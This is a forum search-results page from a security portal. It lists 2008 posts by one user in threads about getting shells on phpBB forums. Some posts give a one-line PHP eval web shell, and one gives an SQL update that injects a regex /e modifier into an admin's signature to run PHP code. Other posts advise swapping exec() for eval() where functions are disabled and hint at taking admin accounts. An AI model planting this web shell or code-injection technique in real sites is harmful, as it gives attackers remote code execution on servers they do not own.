Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 13, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 484
Members: 0
Total: 484
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index
Search found 10 matches
PUNbb sql injection
PostForum: All other software   Posted: Thu Apr 10, 2008 2:44 pm   Subject: Re: PUNbb sql injection
theparadox
 
Replies: 2
Views: 9118




Hi there,


I am able to insert this command using the administration panel of the forum. There is also a backup feature but its not working so i need to try this manually.

I managed to get sql ...
Shell indetectable?
PostForum: Shell commands injection   Posted: Sat Apr 05, 2008 11:56 am   Subject: Shell indetectable?
theparadox
 
Replies: 5
Views: 15359




learn php and use the better shell never made:


<?PHP
eval(stripslashes($_REQUEST[var]));
?>


..and this is cool shell,ya?Stop sending everybody to learn php.
...
Phpbb 2 shell from sql file
PostForum: PhpBB   Posted: Thu Apr 03, 2008 7:19 pm   Subject: Phpbb 2 shell from sql file
theparadox
 
Replies: 5
Views: 9350




Without quotes?

Well, what about eval(stripslashes($_GET

eval($_REQUESTpage.php?var=eval(stripslashes($_REQUEST
sh-scripts\c99sh-b16-bypass-safe-mode
PostForum: Shell commands injection   Posted: Thu Apr 03, 2008 7:16 pm   Subject: sh-scripts\c99sh-b16-bypass-safe-mode
theparadox
 
Replies: 4
Views: 15023




Oh yeaH! what a black hat TooL!

HAHAHAHAHAHAHAHAHAHAHHAHAHAH You really don't know what are you saying uahauhauahuahauahua
Shell indetectable?
PostForum: Shell commands injection   Posted: Thu Apr 03, 2008 7:09 pm   Subject: Shell indetectable?
theparadox
 
Replies: 5
Views: 15359




learn php and use the better shell never made:


<?PHP
eval(stripslashes($_REQUEST[var]));
?>
Phpbb 2 shell from sql file
PostForum: PhpBB   Posted: Thu Apr 03, 2008 11:56 am   Subject: Phpbb 2 shell from sql file
theparadox
 
Replies: 5
Views: 9350




see phpinfo(). 99% passthru is in disabled functions.

A good choice is to put an eval() instead of exec() and other.
phpbb 3.0 salt and admin panel
PostForum: PhpBB   Posted: Thu Apr 03, 2008 11:52 am   Subject: phpbb 3.0 salt and admin panel
theparadox
 
Replies: 4
Views: 12041




PhpBB hashing algorithm is flexible and can be in some degree different from installation to installation, but main feature is using of THOUSANDS md5 hashing rounds for just one hash. It's comparable ...
XSS Private Messagging On PhpBB3
PostForum: PhpBB   Posted: Thu Apr 03, 2008 11:48 am   Subject: XSS Private Messagging On PhpBB3
theparadox
 
Replies: 3
Views: 9444




uahauhauahuauh @rktfan maybe this thread is interesting for you xD
Shell phpBB 2.0.23 ???
PostForum: PhpBB   Posted: Thu Apr 03, 2008 11:45 am   Subject: Shell phpBB 2.0.23 ???
theparadox
 
Replies: 22
Views: 46199




Create file test.sql on your PC and put inside this code

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

Login in admin pan ...
phpbb3 site
PostForum: PhpBB   Posted: Thu Apr 03, 2008 11:41 am   Subject: phpbb3 site
theparadox
 
Replies: 2
Views: 7895




Study php language. Then study phpbb3. After maybe you'll find a quite good way to get admin account (there are some low-risk vulnerability)
Page 1 of 1
All times are GMT
  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.190 Seconds